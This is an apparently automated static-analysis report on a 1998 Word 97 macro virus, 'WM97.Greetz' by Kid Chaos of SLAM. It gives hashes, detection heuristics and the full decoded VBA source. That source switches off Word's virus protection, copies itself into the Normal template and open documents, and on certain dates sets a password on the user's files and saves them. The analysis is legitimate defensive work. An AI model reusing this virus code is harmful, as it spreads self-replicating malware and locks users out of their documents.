Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b77a18eb09c9e5b7…

MALICIOUS

Office (OLE)

34.0 KB Created: 1998-04-23 03:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3c57c120518b42a9e0c404d934b4d4dd SHA-1: b8ebbd488d8716f6e63dd1bc7721606d9593986e SHA-256: b77a18eb09c9e5b759226eb6e73c093f517571637ae30450cb0887233f0da308
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus, specifically mentioning 'Kid Chaos' and 'SLAM' in the document body and script comments. The VBA macros, including an AutoOpen subroutine, are designed to copy themselves to the active document and the Normal template, indicating a self-propagation mechanism. The presence of 'WordBasic_Macro_Virus' and 'VBA_AutoOpen' heuristics further supports this classification.

Heuristics 5

  • ClamAV: Doc.Trojan.Kid-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Kid-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3229 bytes
SHA-256: 9596e1ddb92582fc39a0be2ea17e5b9dfebdabec79ec01143375ce11b602cdee
Detection
ClamAV: Doc.Trojan.Kid-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "KidChaos"
Sub KC()
Dim Temp(3) As String
On Error GoTo Au
Temp(1) = "KidChaos"
Temp(2) = "SLAM"
Temp(3) = "Greetz"
With Application
    ScreenUpdating = False
    DisplayAlerts = wdAlertsNone
End With
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocInf = False
    GloInf = False
 For k = 1 To WordBasic.CountMacros(1)
 If WordBasic.MacroName$(k, 1) = "SLAM" Then DocInf = 1
 Next k
 If DocInf = False Then
     For z = 1 To 3
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
     Destination:=ActiveDocument.FullName, Name:=Temp(z), _
      Object:=wdOrganizerObjectProjectItems
      Next z
    ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        End If
        For k = 1 To WordBasic.CountMacros(0)
 If WordBasic.MacroName$(k, 0) = "Greetz" Then GloInf = 1
 Next k
       If GloInf = False Then
       For z = 1 To 3
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
         Destination:=NormalTemplate.FullName, Name:=Temp(z), _
          Object:=wdOrganizerObjectProjectItems
          Next z
        Options.SaveNormalPrompt = False
    End If
    Application.DisplayAlerts = wdAlertsAll
Au:

End Sub

Sub AutoExec()
'-----X-----S L A M    R O Q S !!! -----X-----
End Sub

Attribute VB_Name = "SLAM"
    
Sub AutoOpen()
' WM97.Greetz dedicated to my brotherz of SLAM VIRUS TEAM!
' (c) April 1998, by Kid Chaos [SLAM]
On Error GoTo seeya
If (Rnd() < 0.4) Then
With Assistant.NewBalloon
.BalloonType = msoBalloonTypeBullets
.Icon = msoIconTip
.Button = msoButtonSetOkCancel
.Heading = "Word97.Greetz" & vbCrLf & "by Kid Chaos [SLAM]"
.Labels(1).Text = " Greetings to SLAM friends:"
.Labels(2).Text = " Virtual Daemon" & vbCrLf & " Aurodreph" _
& vbCrLf & " CyberYoda" & vbCrLf & " Darx Kies" & vbCrLf & _
" Forms" & vbCrLf & " rAiD" & vbCrLf & " Shaitan" & vbCrLf & _
" Stealth Warrior" & vbCrLf & " Trigger" & vbCrLf & " Yesna"
.Show
End With
End If
seeya:
Call KC
End Sub

Sub HelpAbout()
On Error GoTo Ha
If (Day(Now()) > 13) Then
MsgBox "====> (c) 1998 by Kid Chaos <====" & vbCrLf & _
"====>  of SLAM Virus Team  <====" & vbCrLf & vbCrLf & _
"Hey Bill Gates, do you like other cake" & vbCrLf & _
"on your face? :-D" _
, vbCritical, "About WM97.Greetz... :-)"
End If
Ha:
End Sub


Attribute VB_Name = "Greetz"
Sub FileTemplates()
On Error GoTo Ft
If (Day(Now()) = 13) Then
ActiveDocument.Password = "KidChaos"
Documents.Close SaveChanges:=wdSaveChanges
End If
Ft:
End Sub


Sub ToolsMacro()
On Error GoTo St
If (Day(Now()) = 1) Then
ActiveDocument.Password = "WeRoqs"
Documents.Close SaveChanges:=wdSaveChanges
End If
St:
End Sub


Sub ViewVBcode()
On Error GoTo Vv
If (Day(Now()) = 20) Then
ActiveDocument.Password = "SLAM98"
Documents.Close SaveChanges:=wdSaveChanges
End If
Vv:
End Sub